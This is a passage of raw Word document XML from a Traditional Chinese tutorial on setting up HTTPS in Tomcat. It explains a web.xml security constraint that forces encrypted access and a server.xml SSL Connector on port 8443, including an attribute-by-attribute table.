          <w:p w14:paraId="713DEEF1" w14:textId="77777777" w:rsidR="001E5367" w:rsidRPr="00DC0584" w:rsidRDefault="001E5367" w:rsidP="001E5367">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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 xml:space="preserve">Enter PEM pass phrase: 可設定一個新的密碼，用於保護即將生成的 </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
                <w:color w:val="FF23EC"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">privatekey.pem </w:t>
            </w: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>檔案。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F82178" w14:textId="700493C0" w:rsidR="001E5367" w:rsidRPr="00DC0584" w:rsidRDefault="001E5367" w:rsidP="001E5367">
            <w:pPr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 w:hint="eastAsia"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Verifying - Enter PEM pass phrase: 再輸入一次新密碼。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="634C5825" w14:textId="77777777" w:rsidR="001E5367" w:rsidRPr="00DC0584" w:rsidRDefault="001E5367">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46568199" w14:textId="77777777" w:rsidR="0077515E" w:rsidRPr="00DC0584" w:rsidRDefault="0077515E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B2E55" w14:textId="1335EF10" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3" w:rsidP="000936C0">
      <w:pPr>
        <w:pStyle w:val="3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lastRenderedPageBreak/>
        <w:t>四、修改 web.xml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EF3D39" w14:paraId="14FD6F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472D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color w:val="0070C0"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color w:val="0070C0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;security-constraint&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A504A15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&lt;display-name&gt;</w:t>
            </w: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>Constraint1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&lt;/display-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7537056E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&lt;web-resource-collection&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36F2978F" w14:textId="4007F5FB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&lt;web-resource-name&gt;</w:t>
            </w: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>secure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&lt;/web-resource-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13AD0E09" w14:textId="171EBBD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&lt;url-pattern&gt;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/*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&lt;/url-pattern&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710034E0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&lt;/web-resource-collection&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EA7F162" w14:textId="1FDC9C4C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&lt;user-data-constraint&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BE3F266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&lt;transport-guarantee&gt;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CONFIDENTIAL</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4F6228" w:themeColor="accent3" w:themeShade="80"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;/transport-guarantee&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D71CED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b/>
                <w:bCs/>
                <w:color w:val="984806" w:themeColor="accent6" w:themeShade="80"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;/user-data-constraint&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="217DA331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/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;/security-constraint&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BEA4246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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59AA01C5" w14:textId="48E5C456" w:rsidR="0098676C" w:rsidRDefault="0098676C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FD30F3" w14:textId="31C89F29" w:rsidR="009D14BB" w:rsidRPr="00C728FE" w:rsidRDefault="009D14BB" w:rsidP="009D14BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D14BB">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">這段XML代碼是在Web應用程序的web.xml配置文件中使用的，它描述了一個安全性約束 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C728FE">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(&lt;security-constraint&gt;)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B41977C" w14:textId="788EB691" w:rsidR="009D14BB" w:rsidRPr="00842771" w:rsidRDefault="009D14BB" w:rsidP="008D0706">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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&lt;security-constraint&gt;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這個元素定義了一個安全性約束。安全性約束用於指定Web應用程序中哪些資源需要特定的安全性要求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C9983" w14:textId="0663EE9B" w:rsidR="009D14BB" w:rsidRPr="00842771" w:rsidRDefault="009D14BB" w:rsidP="008D0706">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="1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&lt;display-name&gt;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此元素允許您為安全性約束提供描述性名稱。在這裡，它被命名為"Constraint1"。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43879614" w14:textId="6B3AD3D9" w:rsidR="009D14BB" w:rsidRPr="00842771" w:rsidRDefault="009D14BB" w:rsidP="008D0706">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="1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&lt;web-resource-collection&gt;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這個元素定義了該安全性約束所適用的Web資源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55607FC7" w14:textId="4ADE15EE" w:rsidR="009D14BB" w:rsidRPr="00842771" w:rsidRDefault="009D14BB" w:rsidP="008D0706">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="2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&lt;web-resource-name&gt;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這裡，它被命名為"secure"，這是對這組Web資源的描述性名稱。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5955DDDB" w14:textId="44FC2D18" w:rsidR="009D14BB" w:rsidRPr="00842771" w:rsidRDefault="009D14BB" w:rsidP="008D0706">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="2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&lt;url-pattern&gt;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這個元素指定了安全性約束適用的URL模式。在這裡，/*意味著該約束適用於應用程序中的所有URL。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E3801" w14:textId="195ABF33" w:rsidR="009D14BB" w:rsidRPr="00842771" w:rsidRDefault="009D14BB" w:rsidP="008D0706">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="1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&lt;user-data-constraint&gt;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這個元素描述了數據的保護級別。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F74147" w14:textId="77777777" w:rsidR="009D14BB" w:rsidRPr="00842771" w:rsidRDefault="009D14BB" w:rsidP="008D0706">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:leftChars="0"/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2F5544">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;transport-guarantee&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00842771">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 此元素指定數據的保護級別。當設定為CONFIDENTIAL時，它要求數據必須在網路上加密傳輸。這意味著，若您的Web應用程序正在使用HTTP運行，當它受到這個安全性約束的影響時，它會自動重定向到HTTPS，確保數據的加密傳輸。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4064EEE0" w14:textId="77777777" w:rsidR="00842771" w:rsidRDefault="00842771" w:rsidP="009D14BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A9ECA9" w14:textId="45B15DB6" w:rsidR="009D14BB" w:rsidRPr="009D14BB" w:rsidRDefault="009D14BB" w:rsidP="009D14BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D14BB">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>總的來說，這個安全性約束的作用是要求Web應用程序中的所有資源（由於/*模式）都必須通過加密的方式（HTTPS）來訪問。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06704254" w14:textId="77777777" w:rsidR="00CB488A" w:rsidRDefault="00CB488A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="434343"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</w:p>
    <w:p w14:paraId="6C2BCF71" w14:textId="2C9C6234" w:rsidR="0098676C" w:rsidRPr="009D14BB" w:rsidRDefault="007247F3" w:rsidP="00E508DE">
      <w:pPr>
        <w:pStyle w:val="3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/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>五、修改</w:t>
      </w:r>
      <w:r w:rsidRPr="009D14BB">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> server.xml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732318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1523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color w:val="0070C0"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color w:val="0070C0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;Connector</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BB1DFEB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port="8443" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11E80C0C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protocol="org.apache.coyote.http11.Http11NioProtocol"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E22DB64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maxThreads="200"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A473330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scheme="https" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4883AA8E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secure="true" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E32D58F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SSLEnabled="true"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F37D631" w14:textId="0391BB44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keystoreFile="</w:t>
            </w:r>
            <w:r w:rsidR="00E43C20" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">C:/ 完整路徑  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/tomcat.</w:t>
            </w:r>
            <w:r w:rsidR="00593E1F" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Consolas" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pkcs12</w:t>
            </w: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" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C2110C3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keystorePass="123456"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B8CBF2A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clientAuth="false" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="218E7C2F" w14:textId="52EF345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Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">           sslProtocol="TLS"</w:t>
            </w:r>
            <w:r w:rsidR="003A0E57" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Consolas" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs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 w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723EED50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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="247E9C00" w14:textId="1BAD5766" w:rsidR="0098676C" w:rsidRDefault="0098676C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US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6"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="0D511F15" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="00672A8F" w14:textId="38A2ABF4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屬性名稱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0D84D53" w14:textId="0809CD6D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設置值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="551B246C" w14:textId="02F1B9A1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描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="28442541" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C221821" w14:textId="4098BADB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port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4304B056" w14:textId="1DA72863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8443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25EDA0F2" w14:textId="6DB280F5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定義此連接器所監聽的TCP/IP端口號。在此例中，它監聽8443端口，這是HTTPS的常見非標準端口。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="2E10469B" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5955F113" w14:textId="0A0AF6E7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protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="510E4429" w14:textId="278DC559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...</w:t>
            </w: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Http11NioProtocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B59C611" w14:textId="5FC1BB83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定義此連接器使用的協議實現。這裡使用的是NIO（非阻塞輸入/輸出）版本的HTTP 1.1協議。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="0D7FEAEB" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41716646" w14:textId="55D57E4A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maxThreads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="366D6D96" w14:textId="337B5377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200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F11EB63" w14:textId="4AE0608D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限定此連接器可同時處理的最大請求數。超出此數量的請求將會被隊列。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="55A80CDE" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F63E474" w14:textId="2AAAC50E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scheme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="364020FD" w14:textId="459F67CB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https</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="553E64A6" w14:textId="64E7E3D2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指定該連接器所使用的協議（例如 "http" 或 "https"）。在此案例中，它表示該連接器使用HTTPS協議。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="0AAA70A3" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B029550" w14:textId="0046779D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secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D26F0C9" w14:textId="1F084F22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true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79F016DF" w14:textId="404E745F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指出該連接器是否安全。當使用HTTPS或某種其他加密協議時，應將其設為"true"。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="66F53F89" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47AFC800" w14:textId="562D2BC6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SSLEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D9876FA" w14:textId="3B083E4D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true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D191988" w14:textId="1CD17CE2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是否啟用SSL/TLS支持。對於HTTPS連接器，此值應為"true"。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="2B288FD9" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69934F65" w14:textId="19168BCC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keystoreFile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5359D3B8" w14:textId="5798B981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C:/ 完整路徑 /tomcat.pkcs12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="381C279D" w14:textId="55E51644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定義用於SSL/TLS連接的密鑰存儲的路徑。它通常包含伺服器的私鑰和證書。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="48B14B84" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24207943" w14:textId="17F7954B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keystorePass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CD8CE8B" w14:textId="57F81C69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123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74785DBF" w14:textId="24DE1C18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定義訪問密鑰存儲所需的密碼。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="419704C8" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58255802" w14:textId="5A38870C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clientAuth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BAE1C78" w14:textId="2EFD7B48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false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5186F5F8" w14:textId="66F7D4D7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決定是否需要從客戶端請求認證。當設為"true"時，客戶端必須提供一個證書來進行身份驗證。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A92DE8" w:rsidRPr="00E76414" w14:paraId="7E39FC3D" w14:textId="77777777" w:rsidTr="0064471B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FB9D014" w14:textId="09DD9A97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sslProtocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76708473" w14:textId="5C273517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>TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5196" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55963347" w14:textId="25AA7854" w:rsidR="00A92DE8" w:rsidRPr="00E76414" w:rsidRDefault="00A92DE8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E76414"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指定用於連接的SSL/TLS協議版本。在此案例中，使用的是TLS。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F5D310A" w14:textId="77777777" w:rsidR="00A92DE8" w:rsidRPr="00DC0584" w:rsidRDefault="00A92DE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B73C743" w14:textId="77777777" w:rsidR="00E76414" w:rsidRDefault="00E76414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="9900FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="9900FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC9F3A8" w14:textId="2684B07F" w:rsidR="008D3FEF" w:rsidRDefault="00197851" w:rsidP="00197851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="9900FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:color w:val="9900FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>測試：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41DA3E" w14:textId="0E6F198C" w:rsidR="00197851" w:rsidRPr="00197851" w:rsidRDefault="00197851" w:rsidP="00197851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="9900FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:noProof/>
          <w:color w:val="9900FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5733C223" wp14:editId="0819B5EE">
            <wp:extent cx="5733415" cy="798195"/>
